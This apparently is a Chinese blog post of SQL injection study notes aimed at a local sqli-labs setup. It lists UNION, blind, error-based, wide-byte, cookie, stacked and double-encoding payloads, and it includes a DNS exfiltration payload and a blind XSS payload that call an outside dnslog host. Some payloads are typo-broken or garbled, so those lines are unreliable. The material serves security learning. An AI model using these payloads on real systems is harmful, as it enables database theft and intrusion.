sql注入

SQL注入定義：

SQL注入即是指web應用程式對用戶輸入資料的合法性沒有判斷或過濾不嚴，攻擊者可以在web應用程式中事先定義好的查詢陳述句的結尾上添加額外的SQL陳述句，在管理員不知情的情況下實作非法操作，以此來實作欺騙資料庫服務器執行非授權的任意查詢，從而進一步得到相應的資料資訊，

注入型別：

當輸入引數為字串時，稱為字符型，數字型與字符型注入最大的區別在于：數字型不需要單引號閉合，而字串型別一般要使用單引號來閉合，

判斷資料庫型別：

判斷是否是 Mysql資料庫
' and exists(select*from information_schema.tables) --+

判斷是否是 access資料庫
' and exists(select*from msysobjects) --+

判斷是否是 Sqlserver資料庫
' and exists(select*from sysobjects) --+

判斷是否是Oracle資料庫
' and (select count(*) from dual)>0 --+

判斷注入點

數字型：id=2-1(在URL編碼中+代表空格，可能會造成混淆)

字符型：' 、')、 '))、 "、 ")、 "))

注釋符：--空格、--+、/**/、#

UNION注入：

union聯合查詢適用于有顯示列的注入，可以通過order by來判斷當前表的列數

因為頁面只顯示一行資料，所以union注入需要將前面的條件否定(把引數變為負)

union注入可能需要用到的一些資訊：

version() ：資料庫的版本

database() :當前所在的資料庫

@@basedir : 資料庫的安裝目錄

@@datadir ： 資料庫檔案的存放目錄

user() ： 資料庫的用戶

current_user() : 當前用戶名

system_user() : 系統用戶名

session_user() :連接到資料庫的用戶名

獲得所有的資料庫

?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+

獲得所有的表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables --+

獲得指定資料庫所有的表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

獲得所有的列

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns --+

獲得指定資料庫指定表的列

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

獲取具體欄位

?id=-1' union select 1,group_concat(id,'--',username,'--',password),3 from users --+

獲取當前資料庫中指定表的指定欄位的值(只能是database()所在的資料庫內的資料，因為處于當前資料庫下的話不能查詢其他資料庫內的資料)

?id=-1' union select 1,group_concat(password),3 from users --+

盲注：

**判斷是否存在延時注入：**

http://127.0.0.1/mysql/Less-1/?id=1' and sleep(5) --+

http://127.0.0.1/mysql/Less-1/?id=1' and benchmark(100000000,md5(1)) --+

**判斷當前資料庫**

布爾盲注

資料庫database()的長度大于10

'and (length(database()))>10 --+

資料庫database()的第一個字符ascii值大于100

' and ascii(substr(database(),1,1))>100 --+

時間盲注

資料庫database()的長度大于10

' and if((length(database())>10),1,sleep(5)) --+

資料庫的第一個字符的ascii值小于100

' and if((ascii(substring(database(),1,1)))<100,1,sleep(5)) --+

**判斷當前資料庫中的表**

布爾盲注

判斷當前資料庫中的表的個數是否大于5

' and (select count(table_name) from information_schema.tables where table_schema=database())>5 --+
判斷第一個表的長度

' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6 --+

判斷第一個表的第一個字符的ascii值

' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100 --+

時間盲注

判斷當前資料庫中的表的個數是否大于5

' and if((select count(table_name) from information_schema.tables where table_schema=database())>5,1,sleep(5)) --+

判斷第一個表的長度

' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6,1,sleep(5)) --+

判斷第一個表的第一個字符的ascii值

' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,1,sleep(5)) --+

**判斷表中的欄位**

布爾盲注

如果已經證實了存在users表，那么猜測是否存在username欄位

' and exists(select username from users) --+

判斷表中欄位的個數

' and (select count(column_name) from information_schema.columns where table_name='users')>5 --+

判斷第一個欄位的長度

' and length((select column_name from information_schema.columns where table_name='users' limit 0,1))>5 --+

判斷第一個欄位第一個字符的ascii值

' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100 --+

時間盲注

如果已經證實了存在users表，那么猜測是否存在username欄位

' and if(exists(select username from users),1,sleep(5)) --+

判斷表中欄位的個數

' and if((select count(column_name) from information_schema.columns where table_name='users')>5,1,sleep(5)) --+

判斷第一個欄位的長度

' and if(length((select column_name from information_schema.columns where table_name='users' limit 0,1))>5,1,sleep(5)) --+

判斷第一個欄位第一個字符的ascii值

' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100,1,sleep(5)) --+

**判斷欄位中的資料**

布爾盲注

判斷第一個資料的長度

' and length(select id from users limit 0,1)>5 --+

判斷第一個資料第一個字符的ascii值

' and ascii(substr((select id from users limit 0,1),1,1))>100 --+

時間盲注

判斷第一個資料的長度

' and if(length(select id from users limit 0,1)>5,1,sleep5()) --+

判斷第一個資料第一個字符的ascii值

' and if(ascii(substr((select id from users limit 0,1),1,1))>100,1,sleep(5)) --+

使用正則運算式進行盲注

判斷第一個表名的第一個字符是否是a-z中的字符

http://127.0.0.1/mysql/Less-2/?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '^[1]' LIMIT 0,1) --+

然后依據頁面回顯判斷是否正確，最后得到第一個字符為e

然后判斷第一個表名的第二個字符是否是a-z中的字符

http://127.0.0.1/mysql/Less-2/?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '^e[a-z]') --+

依次猜第三個第四個字符，，，

DNS外帶注入

在實際測驗一些網站的安全性問題的時候，有些測驗命令執行后是無回顯的，可以寫腳本來進行盲注，但有些網站會封禁掉ip地址，這樣可以通過設定ip代理池解決，但是遇到盲注往往效率很低，所以產生了DNSlog注入，

MySQL通過DNSlog盲注需要用到load_file()函式，該函式不僅能加載本地檔案，同時也能對URL發起請求，因為需要使用load_file()函式，所以需要root權限，并且secure_file_priv需要為空

Payload：

(SELECT LOAD_FILE(CONCAT('\\\\',(要查詢的陳述句),'.xx.xx.xx\\abc')))

執行的陳述句：

重繪dns平臺：

因為Linux沒有UNC路徑這個東西，所以當MySQL處于Linux系統中的時候，是不能使用這種方式外帶資料的 ，這也就解釋了為什么CONCAT()函式拼接了4個\了，因為轉義的原因，4個就變\成了2個\，目的就是利用UNC路徑，

首先獲取一個dnslog地址，然后拼接到sql陳述句中，

當資料發送后，dnsLog被記錄下來，

也可以在命令之中用HEX編碼，Hex編碼的目的就是減少干擾，因為很多事資料庫欄位的值可能是有特殊符號的，這些特殊符號拼接在域名里無法做dns查詢，因為域名是有一定的規范，有些特殊符號不能帶入，

http://127.0.0.1/mysql/Less-1/?id=1' and (select load_file(concat('\\',hex((select table_name from information_schema.tables where table_schema=database() limit 1)),'.x14y65.dnslog.cn\abc')))%23

解碼后得到第一個表名

當然通過DNSlog也可以盲打xss

payload：

<img src=http://rep964.dnslog.cn>

DNSLog平臺收到的DNS查詢，即可證明存在XSS

報錯注入：

floor報錯原理

需要用到count()，floor(rand()2)，group by這些方法，來看一下都有什么用，

floor作用是向下取整

rand()表示0-1亂數，rand()*2就相當于0-2的亂數，每次運算結果都不同

先查詢users表中資料

floor(rand(0)*2) 每次的結果是隨機的（users表中有13條資料）

而當提供了引數0后，floor(rand(0)*2)的每次結果都相同（users表中有13條資料）

count(*)表示欄位數

group by表示以誰來排序，比如

下面這個依照group by生成的相當于一個新表，先掃描password欄位，如果這個欄位不存在就插入，然后把count(*)置為1，像password為admin2有兩個用戶，第二個用戶插入的時候已經有admin2這個欄位了，也就不會重新生成一個新的admin2欄位，而是在count(*)的基礎上加1，直到依照password掃描完整個表，就形成了以password排序的新表了，

關鍵點：

1.group by后面的主鍵是不能重復的，這是floor報錯的關鍵點

2.在執行group by陳述句時，group by 后面的欄位會被運算兩次

第一次運算：group by拿到欄位后在表內對比，如果后面欄位已經存在，直接插入，不進行二次運算

第二次運算：如果order by后面的欄位不存在，則進行二次運算，由于ran()的隨機性，第二次的運算和第一次可能不一樣，這時候插入可能會導致錯誤的產生，

由于 select floor(rand(0)*2) from users每次結果都相同比較好比較，所以就拿這個查詢陳述句來做演示

select count(*),(concat(floor(rand(0)*2),'@',(select version())))x from users group by x

因為users有13個欄位，(floor(rand(0)*2)由上面的圖也已經確定了為0,1,1,0,1,1,0,0,1,1,1,0,1，

查詢的第一項：

floor(rand(0)*2)=0，結果為[email protected],因為表中還沒有這個值，所以會直接插入，count(*)置為1
但是依照上面第2條關鍵點，在插入前會進行兩次計算第二次運算的時候(floor(rand(0)*2)已經變為1了，所以這張表會先變為

                             x                             count(*)
                       [email protected]                                1

查詢的第二項：

因為第一個插入進行了兩次運算，所以floor(rand(0)*2)=1，結果就為[email protected]，因為表中x已經有了 [email protected]這個欄位，依照上面的第2個關鍵點，直接插入，不進行第二次運算，所以這張表會再變為

                             x                             count(*)
                       [email protected]                                2

查詢的第三項：

前面兩次進行了三次運算，這次floor(rand(0)*2)=0，結果為[email protected]，表中沒有這個欄位，會直接插入，count(*)置為1

但是依照上面第2條關鍵點，在插入前會進行兩次計算第二次運算的時候(floor(rand(0)*2)已經變為1，相應的欄位就變為了[email protected]，這個時候問題就來了：

表中已經有以[email protected]為主鍵的資料了，插入失敗，然后就報錯了，

payload:

select count(*),(concat(floor(rand(0)*2),'@',(select version())))x from users group by x

跟前面的查詢陳述句也是一個道理，只是floor(rand()*2)沒有floor(rand(0)*2)穩定

ExtractValue報錯原理

extractvalue()是對XML檔案進行查詢的函式

語法為：extractvalue(目標xml檔案，xml路徑)

第二個引數 xml中的位置是可操作的地方，xml檔案中查找字符位置是用 /aa/bb/cc/dd/a這種路徑或者純英文純數字格式，但是寫入其他格式就會報錯，并且會回傳寫入的非法格式內容，

所以可以把想要得到的資料寫到xml路徑中從而回傳該資料，

可以看到只要路徑滿足條件無論結果是否有值都不會報錯，而這里version()已經報錯了，說明路徑也不能存在點號，

可以以不是xml格式的語法的內容開頭，然后報錯，但是會顯示無法識別的內容是什么，這樣就達到了目的，

extractvalue()能查詢字串的最大長度為32，就是說如果我們想要的結果超過32，就需要用substring()函式截取，一次查看32位:

payload:

select username from users where id=1 and (extractvalue('anything',concat('#',substring(hex((select database())),1,32)))

UpdateXml報錯原理

updatexml()函式跟extractvalue()類似，是XML檔案進行查詢的函式，

語法為：updatexml(目標xml檔案，xml路徑，更新的內容)

報錯方式也類似，滿足/aa/bb/cc,全數字，全英文

payload:

select username from users where id=1 and (updatexml('anything',concat('+',(select database())),'anything'));

利用：

就用爆當前資料庫做演示，其他的陳述句大同小異

floor報錯注入：

' and (select 1 from (select count(),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()2))name from information_schema.tables group by name)b) --+

ExtractValue報錯注入：

' and extractvalue(1, concat(0x7e, (select database()),0x7e))--+

能查詢字串的最大長度為32，如果長度大于32位分段讀取

' and (extractvalue('anything',concat('#',substring(hex((select database())),1,32))))--+

UpdateXml報錯注入：

' and 1=(updatexml(1,concat(0x3a,(select database()),0x3a),1)) --+

寬位元組注入：

Mysql在使用GBK編碼時，會認為兩個字符為一個漢字，寬位元組注入就是發生在PHP向Mysql請求時字符集使用了GBK編碼，

關于寬位元組注入的幾個函式：

addslashes() ：預定義字符之前添加反斜杠 \ ，預定義字符： 單引號 ' 、雙引號 " 、反斜杠 \ 、NULL，但是這個函式有一個特點就是雖然會添加反斜杠 \ 進行轉義，但是 \ 并不會插入到資料庫中，這個和魔術引號的作用完全相同，所以，如果魔術引號打開了，就不要使用 addslashes() 函式了，

mysql_real_escape_string() ：這個函式用來轉義sql陳述句中的特殊符號x00 、\n 、\r 、\ 、‘ 、“ 、x1a，

magic_quotes_gpc（魔術引號）：當打開時，所有的單引號’ 、雙引號" 、反斜杠\ 和 NULL 字符都會被自動加上一個反斜線來進行轉義，

這三個函式都會把'轉義，會轉義成 \'，

當對用戶輸入的id用 addslashes() 函式進行了處理，并執行id=1'--+時，MySQL實際執行的陳述句是id='1\'--+

很明顯這是沒有注入成功的，單引號并沒有閉合，

這里需要利用到MySQL的一個特性，MySQL在使用GBK編碼的時候，會認為兩個字符是一個漢字，前提是前一個字符的 ASCII 值大于128，才會認為是漢字，

當提交的是 id=1%df'--+時，MySQL執行的陳述句就會變成id='1%df%5c%27--+ ，MySQL正是把%df%5c當成了漢字 運 來處理，所以最后 %27 也就是單引號逃脫了出來，這樣就發生了報錯，

寬位元組修復：

1.使用 mysql_real_escape_string（）
在執行 sql 注入之前必須使用 mysql_set_charset 指定 php 連接 mysql 的字符集，單獨呼叫 mysql_real_escape_string 是無法防御的

2.將 character_set_client 設定為binary(二進制)，

cookie注入

先訪問帶引數的網址127.0.0.1/product_list.asp?smallclass=148

去掉引數:127.0.0.1/product_list.asp?

查看頁面顯示是否正常，如果不正常，說明引數在資料傳遞中是直接起作用的

f12輸入：alert(document.cookie="small148"));

會出現一個彈窗，

127.0.0.1/product_list.asp?頁面重繪后網站顯示正常，

接下來：

1.輸入：javascript:alert(document.cookie="small148 and 1=1"));

彈窗，然后輸入127.0.0.1product_list.asp頁面正常，

2.輸入javascript:alert(document.cookie="small148 and 1=2"));

彈窗，再輸入127.0.0.1/product_list.asp頁面不正常

現在可以確定該網站存在注入漏洞，并且可以通過Cookie進行注入，

然后換陳述句猜解欄位數:

javascript:alert(document.cookie="small148 order by 12"));

或者使用sqlmap后加入引數 --cookie "smallclass=148" --table --level 2

堆疊注入：

堆疊注入(Stacked injections)就是將多條sql陳述句以;分隔，并同時執行多條任意陳述句，

查詢users表并創建一個跟users類似的表

select * from users where id=1;create table test123 like users;

看是否創建成功：

二次編碼注入：

漏洞產生原因：

后端程式的編碼函式，如urldecode(),rawurldecode()等，與PHP本身處理編碼時，放在了一個尷尬的使用位置，與PHP自身編碼配合失誤，其本質就是將%2527先解碼成%27再解碼成單引號

實體：

如果提交：http://127.0.0.1/sql.php?id=1%27

就可以繞過對'的轉義，從而造成了sql注入攻擊

在測驗時，如果發現了頁面可能存在二次編碼注入漏洞，可在注入點后加上%2527然后用sqlmap跑

python3 sqlmap.py -u "http://127.0.0.1/erci.php?id=1%27*"

或者使用自帶的腳本chardoubleencode.py進行注入

還有幾個沒總結到，慢慢補吧，，，

標籤：其他

上一篇：sql注入檔案讀寫

下一篇：安全利器 — SELinux